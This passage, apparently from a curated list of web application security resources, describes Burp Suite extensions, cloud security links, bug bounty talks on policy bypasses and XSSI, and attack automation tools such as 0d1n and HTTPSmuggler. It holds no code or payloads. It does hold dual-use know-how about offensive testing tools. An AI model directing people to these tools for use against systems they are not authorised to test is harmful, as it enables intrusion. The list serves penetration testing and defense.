      • Parses Swagger files into the BurpSuite for automating RESTful API testing – approved by Burp for inclusion in their official BApp Store.
    • Burp-molly-pack
      • Burp-molly-pack is Yandex security checks pack for Burp. The main goal of Burp-molly-pack is to extend Burp checks. Plugins contains Active and Passive security checks.
    • NoPE Proxy
      • Non-HTTP Protocol Extension (NoPE) Proxy and DNS for Burp Suite.
    • AutoRepeater
      • Burp Suite is an intercepting HTTP Proxy, and it is the defacto tool for performing web application security testing. While Burp Suite is a very useful tool, using it to perform authorization testing is often a tedious effort involving a "change request and resend" loop, which can miss vulnerabilities and slow down testing. AutoRepeater, an open source Burp Suite extension, was developed to alleviate this effort. AutoRepeater automates and streamlines web application authorization testing, and provides security researchers with an easy-to-use tool for automatically duplicating, modifying, and resending requests within Burp Suite while quickly evaluating the differences in responses.
    • Uniqueness plugin for Burp Suite
      • Makes requests unique based on regular expressions. Handy for registration forms and any other endpoint that requires unique values upon every request.
    • Bumpster
      • The Unofficial Burp Extension for DNSDumpster.com. You simply supply a domain name and it returns a ton of DNS information and basically lays out the external network topology.
    • J2EEScan
      • J2EEScan is a plugin for Burp Suite Proxy. The goal of this plugin is to improve the test coverage during web application penetration tests on J2EE applications.
    • JWT4B
      • JSON Web Tokens (JWT) support for the Burp Interception Proxy. JWT4B will let you manipulate a JWT on the fly, automate common attacks against JWT and decode it for you in the proxy history. JWT4B automagically detects JWTs in the form of 'Authorization Bearer' headers as well as customizable post body parameters.
    • Brida
      • Brida is a Burp Suite Extension that, working as a bridge between Burp Suite and Frida, lets you use and manipulate applications’ own methods while tampering the traffic exchanged between the applications and their back-end services/servers. It supports all platforms supported by Frida (Windows, macOS, Linux, iOS, Android, and QNX)
    • burp-suite-error-message-checks
      • Burp Suite extension to passively scan for applications revealing server error messages
    • Postman-Integration
      • Postman Integration is an extension for burp to generate Postman collection fomat json file.
    • Stepper
      • Stepper is designed to be a natural evolution of Burp Suite's Repeater tool, providing the ability to create sequences of steps and define regular expressions to extract values from responses which can then be used in subsequent steps.
    • LinkDumper Burp Plugin
      • Extract (links/possible endpoints) from responses & filter them via decoding/sorting
    • Cyber Security Transformation Chef
      • The Cyber Security Transformation Chef (CSTC) is a Burp Suite extension. It is build for security experts to extend Burp Suite for chaining simple operations for each incomming or outgoing message. It can also be used to quickly make a special custom formatting for the message.
    • jsonp
      • jsonp is a Burp Extension which attempts to reveal JSONP functionality behind JSON endpoints. This could help reveal cross-site script inclusion vulnerabilities or aid in bypassing content security policies.
    • Asset Discover
      • Burp Suite extension to discover assets from HTTP response using passive scanning.
      • Blogpost
    • Dr. Watson
      • Dr. Watson is a simple Burp Suite extension that helps find assets, keys, subdomains, IP addresses, and other useful information! It's your very own discovery side kick, the Dr. Watson to your Sherlock!
    • Stepper
      • Stepper is designed to be a natural evolution of Burp Suite's Repeater tool, providing the ability to create sequences of steps and define regular expressions to extract values from responses which can then be used in subsequent steps.
    • BurpExtenderHeaderChecks
    • Hackbar
      • Hackbar plugin for Burp
    • HTTPSmuggler
      • A Burp Suite extension to help pentesters to bypass WAFs or test their effectiveness using a number of techniques. This extension has been developed by Soroush Dalili (@irsdl) from NCC Group.

General Cloud Services

AWS

Microsoft Azure

Cloudflare

Google Cloud

Bug Bounty Writeups

Client to Authenticator Protocol (CTAP) & FIDO2

https://d1.awsstatic.com/whitepapers/Security/AWS_Security_Whitepaper.pdf https://d1.awsstatic.com/whitepapers/Storage/AWS%20Storage%20Services%20Whitepaper-v9.pdf

  • Breaking and abusing specifications and policies - Frans Rosén(SecurityFest 2018)

    • Last year at Secfest, Frans Rosén talked about DNS hijacking using cloud services. This time, he approaches technologies where verification methods actually exists and how to break them. Let’s Encrypt closed down one of their three blessed verification methods due to a bug Frans found in January. Cloud storage containers already patched from being publicly exposed are still often vulnerable to full modification, extraction and deletion by abusing weak policies and application logic. Frans goes through some weak design patterns, policy structures and explains how to bypass them which have netted him over $45,000 in bug bounties.

  • Turtles All The Way Down: Storing Secrets in the Cloud and in the Data Center - Daniel Somerfield

  • Web IDL Standards

    • This document defines an interface definition language, Web IDL, that can be used to describe interfaces that are intended to be implemented in web browsers. Web IDL is an IDL variant with a number of features that allow the behavior of common script objects in the web platform to be specified more readily. How interfaces described with Web IDL correspond to constructs within ECMAScript execution environments is also detailed in this document. It is expected that this document acts as a guide to implementors of already-published specifications, and that newly published specifications reference this document to ensure conforming implementations of interfaces are interoperable.

  • Big List of Naughty Strings

    • The Big List of Naughty Strings is an evolving list of strings which have a high probability of causing issues when used as user-input data. This is intended for use in helping both automated and manual QA testing; useful for whenever your QA engineer walks into a bar.

http://l0.cm/encodings/table/

JSON

Add links to SSL/TLS RFCs

Homograph attacks

XSSI

  • The Tale of a Fameless but Widespread Web Vulnerability Class - Veit Hailperin

    • Two keys components account for finding vulnerabilities of a certain class: awareness of the vulnerability and ease of finding the vulnerability. Cross-Site Script Inclusion (XSSI) vulnerabilities are not mentioned in the de facto standard for public attention - the OWASP Top 10. Additionally there is no public tool available to facilitate finding XSSI. The impact reaches from leaking personal information stored, circumvention of token-based protection to complete compromise of accounts. XSSI vulnerabilities are fairly wide spread and the lack of detection increases the risk of each XSSI. In this talk we are going to demonstrate how to find XSSI, exploit XSSI and also how to protect against XSSI.

  • 0d1n

    • 0d1n is a tool for automating customized attacks against web applications.

About